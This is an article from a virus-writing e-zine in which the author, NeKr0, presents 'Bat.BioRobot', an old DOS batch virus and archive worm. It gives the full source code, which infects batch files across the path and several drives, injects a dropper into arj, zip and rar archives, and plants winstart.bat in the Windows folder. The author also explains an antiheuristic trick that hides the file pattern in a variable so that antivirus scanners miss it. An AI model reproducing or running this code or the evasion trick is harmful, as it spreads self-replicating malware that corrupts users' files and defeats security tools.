The Revoluti0n
last article table of contents next article

Strange Article - Bat.BioRobot by NeKr0

 Dont kick me! Its my ooold virus, when i was interested in batch :)

  Its a pretty simple virus/archive-worm (he was written in old dos times and
useed for worming archvators from path). And it uses one antiheuristic trick.
Bastard AV scream if they see a string like "for %%a in (*.bat) do ..." .
But if you set variable=bat or *.bat and write "for %%a in (*.%variable%)" AV just shuts up :) .

Work: Trying to add dropper in arj, rar & zip archives.
      Infects bat files in path, current dir, updir and c: d: e: disks
      Adds dropper in %windir% folder as winstart.bat

========= There is Bat.BioRobot
@ctty nul%BR1%
if '%1'=='BR1DiR' goto BR1diRz
if '%1'=='BR1' goto BR1zex
set BR1FK=bat
Find "BR1"<%0>>BR1.bat
for %%a in (*.arj ..\*.arj) do arj a %%a BR1.bat
for %%a in (*.zip ..\*.zip) do pkzip %%a BR1.bat
for %%a in (*.rar ..\*.rar) do rar a %%a BR1.bat
for %%r in (%path% . .. c: d: e:) do call BR1.bat BR1DiR %%r
goto BR1pre
for %%c in (%2\*.%BR1FK%) do if not %%c==%2\AUTOEXEC.BAT call BR1.bat BR1 %%c 
goto BR1end
type BR1.bat >%windir%\winstart.bat
del BR1.bat
goto BR1end
Find "BR1"<%2>nul
if errorlevel 1 type BR1.bat>>%2
:BR1end [StRANGER.Bi0R0b0t NeKr0!]
================ There is no Bat.BioRobot :p

P.S.: You may not use batch, but you MUST know batch :p

living virus